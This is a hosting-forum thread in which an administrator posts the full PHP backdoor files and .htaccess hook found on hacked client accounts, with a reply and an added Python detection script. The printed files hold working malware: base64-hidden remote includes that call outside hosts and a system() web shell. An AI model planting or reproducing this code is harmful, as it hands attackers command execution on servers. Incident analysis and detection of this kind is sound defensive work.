  1. #1
    Member
    Join Date
    Apr 2005
    Posts
    23

    Create.PHP, Base.PHP and .htaccess

    Hi Guys, Gals And Guys Who Are Sometimes Gals..

    A few clients have been hacked recently on one particular server that I have. At first I figured it was just random attacks, as the types of programs that were hacked were all different, until I noticed that each of these hacked accounts had the same few files that were put there on the same date and had the same ownership/permissions. The files were create.php, download.php, base.php and then a .htaccess file created to reference them. The files were all set to full 777 permissions and they were owned by nobody.

    Below is the content from all the files

    base.php or create.php content are the same:

    Code:
    <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>

    .htaccess contents:

    Code:
    Options -MultiViews
    ErrorDocument 404 //projects/Calendar/includes/create.php

    download.php contents:

    Code:
    <?php
    error_reporting(0);
    if(isset($_POST["l"]) and isset($_POST["p"])){
        if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
        else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
    }else{$user_auth="";}
    if(!isset($_POST["log_flg"])){$log_flg="&log";}
    if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
    {
        if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
        if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
    }
    ?>
    Has anybody else noticed these types of files as of yet, and if not could anybody possibly inform me what these files are really trying to do as I am obviously not quite sure.

    Thanks as always
    Mark

  2. #2
    Registered User
    Join Date
    Apr 2004
    Posts
    69

    This script got injected due to wrong permission to folders 777. I am also having this problem.
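
Added example, not part of either post: a static triage sketch in Python for the pattern in the files quoted in #1 (a remote `include` whose URL is hidden in `base64_decode()` literals, and `system()` fed from `$_GET`) plus the 777 mode raised in #2. The sample input is constructed with a placeholder host, and `deobfuscate`, `triage` and `scan_tree` are names chosen here.

```python
import base64, binascii, os, re, stat

# base64_decode("...") with a literal argument, as in the posted files
B64_CALL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
# include/require followed by a run of concatenated double-quoted literals
INCLUDE_ARG = re.compile(
    r'\b(?:include|require)(?:_once)?\s*\(?\s*((?:"[^"]*"\s*\.\s*)*"[^"]*")', re.I)
# command-execution functions called directly on request input
REQUEST_TO_SHELL = re.compile(
    r'\b(?:system|exec|passthru|shell_exec|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)', re.I)

def deobfuscate(php):
    """Swap base64_decode("literal") for the decoded literal. Nothing is executed."""
    def decode(m):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            return m.group(0)              # not base64 text: leave the call as written
        return m.group(0) if '"' in text else '"' + text + '"'
    return B64_CALL.sub(decode, php)

def triage(php, mode=None):
    """Return (finding, detail) pairs; literals such as "http://"."host" are joined first."""
    clear, findings = deobfuscate(php), []
    for m in INCLUDE_ARG.finditer(clear):
        target = "".join(re.findall(r'"([^"]*)"', m.group(1)))
        if re.match(r'(?:https?|ftp)://', target, re.I):
            findings.append(("remote-include", target))
    for m in REQUEST_TO_SHELL.finditer(clear):
        findings.append(("request-to-shell", m.group(0)))
    if mode is not None and mode & stat.S_IWOTH:
        findings.append(("world-writable", oct(stat.S_IMODE(mode))))
    return findings

def scan_tree(root):
    """Yield (path, findings) for every flagged .php file under root."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, errors="replace") as fh:
                    hits = triage(fh.read(), os.stat(path).st_mode)
                if hits:
                    yield path, hits

# Constructed sample (placeholder host), shaped like the files quoted in post #1
SAMPLE = ('<? include(base64_decode("%s").base64_decode("%s")."/?".$str);'
          ' if(isset($_GET["k"])){system($_GET["k"]);} ?>'
          % tuple(base64.b64encode(s).decode() for s in (b"http://", b"c2.example.invalid")))
```

Run `scan_tree()` over each account's document root. PHP only fetches an include like this when `allow_url_include` (or, on older versions, `allow_url_fopen`) is enabled, so check php.ini as well.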
